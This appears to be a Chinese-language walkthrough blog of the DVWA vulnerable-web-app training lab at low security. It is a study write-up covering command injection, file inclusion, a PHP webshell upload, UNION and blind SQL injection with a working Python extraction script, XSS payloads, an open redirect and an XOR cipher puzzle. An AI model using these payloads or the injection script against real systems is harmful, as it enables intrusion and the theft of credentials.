LOW
Brute Force
爆破,没什么好说的
Command Injection
命令执行
127.0.0.1 & dir
秒了
Cross Site Request Forgery (CSRF)
跨站请求伪造
一个构造恶意链接修改密码的简单场景实现
File Inclusion
任意文件包含
观察链接,发现他的文件的访问实际就是page参数控制的,那么我们输入一个并不存在的文件报发现了文件路
http://127.0.0.1/vulnerabilities/fi/?page=tsed.php Warning: include(tsed.php): failed to open stream: No such file or directory in C:\YY\phpstudy_pro\WWW\DVWA-2.4\vulnerabilities\fi\index.php on line 36 Warning: include(): Failed opening 'tsed.php' for inclusion (include_path='.;C:\php\pear') in C:\YY\phpstudy_pro\WWW\DVWA-2.4\vulnerabilities\fi\index.php on line 36 http://127.0.0.1/vulnerabilities/fi/?page=../../phpinfo.php 目录穿越可以查看phpinfo文件
File Upload
文件上传
没做任何过滤,简单的php一句话就传上去了
并且贴心的给出了文件路径...
把得到的路径一拼接,成功读取到文件并解析
127.0.0.1/vulnerabilities/upload/../../hackable/uploads/1.php
蚁剑直接连啊,还等什么
Insecure CAPTCHA
不安全的验证码
一进去就报错
reCAPTCHA API key missing from config file: C:\YY\phpstudy_pro\WWW\DVWA-2.4\config\config.inc.php
度娘一下,之前搭建环境偷懒的报复来了,修改config.inc.php文件
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg'; $_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';
刷新页面解决报错,开始看题
由于网络原因似乎...放弃
SQL Injection
SQL注入,嘿嘿嘿
GET传参类型,单引号字符型
GET /vulnerabilities/sqli/?id=1'+and+1=2--+&Submit=Submit #判断存在注入 GET /vulnerabilities/sqli/?id=1'+order+by+2--+&Submit=Submit #判断2列 GET /vulnerabilities/sqli/?id=1'+union+select+1,2--+&Submit=Submit #两列都是回显点欸 GET /vulnerabilities/sqli/?id=1'+union+select+version(),database()--+&Submit=Submit #数据库版本是:5.7.26 库名是:dvwa
本来一切都很好,一次简单的sql注入罢了,什么过滤什么waf都没有,但随着查询表名注入的开始,一切都不一样了
大坑啊,排了半天的错,我都怀疑我自己技术差劲到连最基础的sql注入都注不进去的地步了
nnd,首先上原始的语句
GET /vulnerabilities/sqli/?id=1'+union+select+table_name,2+from+information_schema.tables+where+table_schema='dvwa'--+ #最简单的注入语句啊,检查来检查去没有任何问题但是就是报错注入不进去 #老给我报错'Illegal mix of collations for operation 'UNION''
最后你猜怎么着,dvwa表的字符集和排序规则和information_schema表的对不上号...
抽象,竟然是我自己的环境有问题
问题找到了,排错呗,统一规则
ALTER TABLE users CONVERT TO CHARACTER SET utf8 COLLATE utf8_general_ci; #修改表的字符集和排序规则
那么现在的语句可以注入了吧
GET /vulnerabilities/sqli/?id=1'+union+select+2,table_name+from+information_schema.tables+where+table_schema='dvwa'--+ #dvwa数据库含有两张数据表users,guestbook GET /vulnerabilities/sqli/?id=1'+union+select+column_name,2+from+information_schema.columns+where+table_name='users'--+ #users表中含有以下字段user_id,first_name,last_name,user,password,avatar,last_login,failed_login GET /vulnerabilities/sqli/?id=1'+union+select+user,password+from+users--+ #查到账户名和hash密码,hahaha
SQL Injection (Blind)
SQL盲注
经过测试,还是GET型单引号闭合传参
http://192.168.3.15/vulnerabilities/sqli_blind/?id=1'+and+3=3--+&Submit=Submit# #数据猜测正确的提示为:User ID exists in the database. http://192.168.3.15/vulnerabilities/sqli_blind/?id=1'+and+2=3--+&Submit=Submit# #数据猜测错误的提示为:User ID is MISSING from the database.
那么写个python吧...
好好好,这里来了坑,怎么用python模拟登录...学习一下
ok,python3使用requests库模拟登录
首先抓包登录后的网站,抓取到登陆后的cookie然后伪造,且看下述实例.cookie必须写成字典的形式哦
import requests cookies={"security":"low","PHPSESSID":"0u6h22non1g09bducgi804edmv"} url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+length(database())=1--+&Submit=Submit#" req=requests.get(url,cookies=cookies) req=req.text print(req)
接下来就是完整的盲注了
import requests key="MISSING" cookies={"security":"low","PHPSESSID":"0u6h22non1g09bducgi804edmv"} def onefor(a): for i in range(1,a+1): #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+length(database())={i}--+&Submit=Submit#" #数据库有四个字符 #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+(select+count(*)+from+information_schema.tables+where+table_schema='dvwa')={i}--+&Submit=Submit#" #dvwa数据库有两张表 #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+length((select+table_name+from+information_schema.tables+where+table_schema='dvwa'+limit+1,1))={i}--+&Submit=Submit#" #第一张表9个字符limit+0,1,第二张表5个字符limit+1,1 #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+(select+count(*)+from+information_schema.columns+where+table_name='users'+and+table_schema='dvwa')={i}--+&Submit=Submit#" #users表含有8个字段 #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+length((select+column_name+from+information_schema.columns+where+table_name='users'+and+table_schema='dvwa'+limit+0,1))={i}--+&Submit=Submit#" #users表第一个字段含有7个字节 #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+(select+count(*)+from+users)={i}--+&Submit=Submit#" #users表中共有5行数据 #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+length((select+user+from+users+limit+0,1))={i}--+&Submit=Submit#" #users表user字段第一行数据有5个字符 req=requests.get(url,cookies=cookies) req=req.text print(url) if key not in req: print('!'*10) print(i) print('!'*10) break def twofor(a): name='' #承接表名或者库名 for j in range(1,a+1): for i in range(33,126): #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+ascii(mid(database(),{j},1))={i}--+&Submit=Submit#" #数据库名dvwa #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+ascii(mid((select+table_name+from+information_schema.tables+where+table_schema='dvwa'+limit+1,1),{j},1))={i}--+&Submit=Submit#" #第一张表是guestbook,第二张表是users #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+ascii(mid((select+column_name+from+information_schema.columns+where+table_name='users'+and+table_schema='dvwa'+limit+0,1),{j},1))={i}--+&Submit=Submit#" #users表第一个字段是user_id url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+ascii(mid((select+user+from+users+limit+0,1),{j},1))={i}--+&Submit=Submit#" #users表user字段第一行值是admin req=requests.get(url,cookies=cookies) req=req.text print(url) if key not in req: name=name+chr(i) print('*'*100) print(name) print('*'*100) break #onefor(5) twofor(5)
Weak Session IDs
就是对于cookie值的伪来进行登录
DOM Based Cross Site Scripting (XSS)
DOM型XSS,DOM型XSS不同之处在于DOM型XSS一般和服务器的解析响应没有直接关系,而是在JavaScript脚本动态执行的过程 中产生的
http://192.168.3.15/vulnerabilities/xss_d/?default=English #点击了按钮页面反应,观察get参数,发现default处传参可能存在dom型xss 192.168.3.15/vulnerabilities/xss_d/?default=<script>alert('XSS')</script> #构造payload成功弹窗
Reflected Cross Site Scripting (XSS)
反射型XSS,反射型XSS通常出现在搜索等功能中,需要被攻击者点击对应的链接才能触发
观察网页发现一个输入框,那么输入测试语句并提交
<script>alert('XSS')</script> #成功弹窗,带有payload的链接如下 http://192.168.3.15/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E#
Stored Cross Site Scripting (XSS)
储存型XSS相比反射型来说危害较大,在这种漏洞中,攻击者能够把攻击载荷存入服务器的数据库中,造成持久化的攻击。
这种在留言板之类的场景见的尤其多,这一关就是这样的场景.
观察页面,上部分一个留言板,下部分还有测试留言
我们直接填入测试语句
Name:qwe Message:<script>alert('XSS')</script>
可以看见,网页弹窗,而且看得见qwe标题,但不见内容.
这是因为填入的测试语句已经被当作网页的一部分执行了,而不是文本元素
Content Security Policy (CSP) Bypass
呦,乍一看新鲜玩意,没见过啊,查一下
Content Security Policy(内容安全策略),用于定义脚本和其他资源从何处加载或者执行,总结的来说就时白名单。会一定程度的缓解xss脚本问题,也可以自己设定规则,管理网站允许加载的内容。
CSP 以白名单的机制对网站加载或执行的资源起作用,在网页中策略通过 HTTP 头信息或者 meta 元素定义。CSP 虽然提供了强大的安全保护,但是它也令 eval() 及相关函数被禁用、内嵌的 JavaScript 代码将不会执行、只能通过白名单来加载远程脚本。
好了,了解完了,看看代码吧
<?php $headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com https://digi.ninja ;"; // allows js from self, pastebin.com, hastebin.com, jquery, digi.ninja, and google analytics. header($headerCSP); # These might work if you can't create your own for some reason # https://pastebin.com/raw/R570EE00 # https://www.toptal.com/developers/hastebin/raw/cezaruzeka ?> <?php if (isset ($_POST['include'])) { $page[ 'body' ] .= " <script src='" . $_POST['include'] . "'></script> "; } $page[ 'body' ] .= ' <form name="csp" method="POST"> <p>You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:</p> <input size="50" type="text" name="include" value="" id="include" /> <input type="submit" value="Include" /> </form> <p> As Pastebin and Hastebin have stopped working, here are some scripts that may, or may not help. </p> <ul> <li>https://digi.ninja/dvwa/alert.js</li> <li>https://digi.ninja/dvwa/alert.txt</li> <li>https://digi.ninja/dvwa/cookie.js</li> <li>https://digi.ninja/dvwa/forced_download.js</li> <li>https://digi.ninja/dvwa/wrong_content_type.js</li> </ul> <p> Pretend these are on a server like Pastebin and try to work out why some work and some do not work. Check the help for an explanation if you get stuck. </p> ';
好好好,你信任来自这些域名的js:astebin.com, hastebin.com, jquery, digi.ninja, and google analytics
JavaScript Attacks
啥意思,又是新鲜的东西...
前端安全...JS我也美学啊
网页一打开叫我输入succcess,输入了又说我无效令牌.看看源码把
关键代码如下
function generate_token() { var phrase = document.getElementById("phrase").value; document.getElementById("token").value = md5(rot13(phrase)); }
看不懂,问ai:
这段代码是一个JavaScript函数 generate_token()
,它的作用是从HTML文档中获取用户输入的短语,对其进行加密处理,然后将加密后的结果显示在页面的另一个元素中。下面是对这个函数的详细分析:
哦哦,token值是和用户输入字符串]绑定生成的
抓包看看
哎呦,我输入啥token都不变,难怪提示令牌无效
先文本框输入succcess然后F12控制台,控制台里输入generate_token()这个方法手动生成token
成了,哈哈,抓包token果然变了
以后有空了补课JS
Authorisation Bypass
搞这么高大上的名字,就是未授权访问...
low模式太拉跨,没做任何限制,随便换个号就能访问
Open HTTP Redirect
额,跳转漏洞?
直接看源码吧
vulnerabilities/open_redirect/source/low.php
<?php if (array_key_exists ("redirect", $_GET) && $_GET['redirect'] != "") { header ("location: " . $_GET['redirect']); exit; } http_response_code (500); ?> <p>Missing redirect target.</p> <?php exit; ?>
好好好,漏洞点在别的目录里面
看看payload吧
http://192.168.3.15/vulnerabilities/open_redirect/source/low.php?redirect=https://baidu.com
Cryptography Problems
Lg4WGlQZChhSFBYSEB8bBQtPGxdNQSwEHREOAQY=
额,看着是base加密的文本,但实际上base系列试了个遍,除了base45解得出来一个字符串还是错误的,其他的解码都不出来,审一下源码吧
<?php function xor_this($cleartext, $key) { // Our output text $outText = ''; // Iterate through each character for($i=0; $i<strlen($cleartext);) { for($j=0; ($j<strlen($key) && $i<strlen($cleartext)); $j++,$i++) { $outText .= $cleartext[$i] ^ $key[$j]; } } return $outText; } $key = "wachtwoord"; $errors = ""; $success = ""; $messages = ""; $encoded = null; $encode_radio_selected = " checked='checked' "; $decode_radio_selected = " "; $message = ""; if ($_SERVER['REQUEST_METHOD'] == "POST") { try { if (array_key_exists ('message', $_POST)) { $message = $_POST['message']; if (array_key_exists ('direction', $_POST) && $_POST['direction'] == "decode") { $encoded = xor_this (base64_decode ($message), $key); //加密是先base64解码消息,然后异或消息和key $encode_radio_selected = " "; $decode_radio_selected = " checked='checked' "; } else { $encoded = base64_encode(xor_this ($message, $key)); } } if (array_key_exists ('password', $_POST)) { $password = $_POST['password']; $decoded = xor_this (base64_decode ($password), $key); //关键逻辑,解密时先base64解码然后异或 if ($password == "Olifant") { //其实这里把答案给出来了吗,嘿嘿嘿,解密还是要写的 $success = "Welcome back user"; } else { $errors = "Login Failed"; } } } catch(Exception $e) { $errors = $e->getMessage(); } } ?>
原来不是单纯的base,还掺杂了xor在里面,难怪解不出来哦
那么加解密逻辑理清楚了,接下来使用python写出解密脚本就可以了
import base64 def xor(message,key): outText = "" key_length = len(key) for i in range(len(message)): key_char = key[i % key_length] //我觉得这一步写的很巧妙,这一步抄的AI的,我写不出来... outText += chr(message[i] ^ ord(key_char)) return outText message="Lg4WGlQZChhSFBYSEB8bBQtPGxdNQSwEHREOAQY=" key="wachtwoord" print(xor(base64.b64decode(message),key))
好,那么输出的答案是:Your new password is: Olifant
我勒个,居然还有提示语,好好好